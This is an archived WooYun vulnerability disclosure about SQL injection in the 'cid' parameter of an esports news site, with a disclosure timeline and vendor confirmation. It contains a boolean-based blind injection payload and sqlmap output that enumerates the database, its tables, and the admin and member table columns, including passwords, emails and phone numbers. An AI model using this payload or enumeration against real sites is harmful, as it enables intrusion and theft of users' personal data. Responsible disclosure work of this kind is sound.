乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
本網站成立宗旨,希望能成為推動電子競技運動的搖籃。讓遊戲廠商、贊助廠商在舉辦賽事或提供贊助時,能更有效的達到宣傳或促銷目的,
问题链接:http://**.**.**.**/news/article.php?cid=4&id=3764
sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (3305=3305) THEN 3305 ELSE 3305*(SELECT 3305 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&id=3764---web application technology: Apacheback-end DBMS: MySQL 5.0current database: 'esports'current user is DBA: Falseavailable databases [2]:[*] esports[*] information_schema
Database: esports+-------------------------+---------+| Table | Entries |+-------------------------+---------+| live_viewer | 12370 || news | 3378 || news_copy | 3192 || news_1018 | 2973 || members | 583 || city_area | 365 || p2p_video | 250 || board_article_cate_copy | 238 || board_article_cate | 236 || member_room_info | 234 || p2p_video_copy | 105 || board_respond_copy | 72 || games_menu | 65 || vod | 37 || board_cate | 32 || contact | 32 || board_follower | 31 || comments | 30 || vod_copy | 29 || live_follow | 28 || vod_150205 | 28 || board_respond_re | 24 || city | 23 || system_info | 22 || board_respond | 17 || products_categories | 13 || board_article_copy | 8 || categories | 7 || qa | 7 || news_cate | 6 || team_article_cate | 6 || live_follow_copy | 5 || products | 5 || vod_cate | 4 || comments_respond | 3 || manager_copy | 2 || manager | 1 || qa_cate | 1 |+-------------------------+---------+
Table: manager[11 columns]+------------+-------------------+| Column | Type |+------------+-------------------+| available | enum('0','1','2') || country | varchar(30) || email | varchar(128) || fax | varchar(30) || id | int(5) || name | varchar(64) || password | varchar(32) || phone | varchar(32) || priv | varchar(5) || registDate | int(10) || username | varchar(16) |+------------+-------------------+Database: esportsTable: members[32 columns]+---------------+-------------------+| Column | Type |+---------------+-------------------+| address1 | varchar(250) || address2 | varchar(250) || birthday | date || channelinfo | varchar(2000) || channellogo | varchar(100) || channelname | varchar(100) || channeluimg | varchar(250) || chat_talk | enum('0','1') || check_way | enum('1','2') || chk_code | varchar(20) || chk_code_time | varchar(20) || company | varchar(100) || country | varchar(100) || edu | varchar(10) || email | varchar(250) || fullname | varchar(20) || id | int(11) || income | varchar(50) || job | varchar(50) || mobile | varchar(250) || mobile_chk | enum('0','1') || msgbox | tinyint(1) || nickname | varchar(250) || password | varchar(100) || register_ip | varchar(15) || register_time | varchar(15) || sid | varchar(20) || state | enum('0','1','2') || tel | varchar(25) || uimg | varchar(250) || username | varchar(250) || zipcode | varchar(5) |+---------------+-------------------+
危害等级:高
漏洞Rank:16
确认时间:2015-12-24 18:42
感謝通報
暂无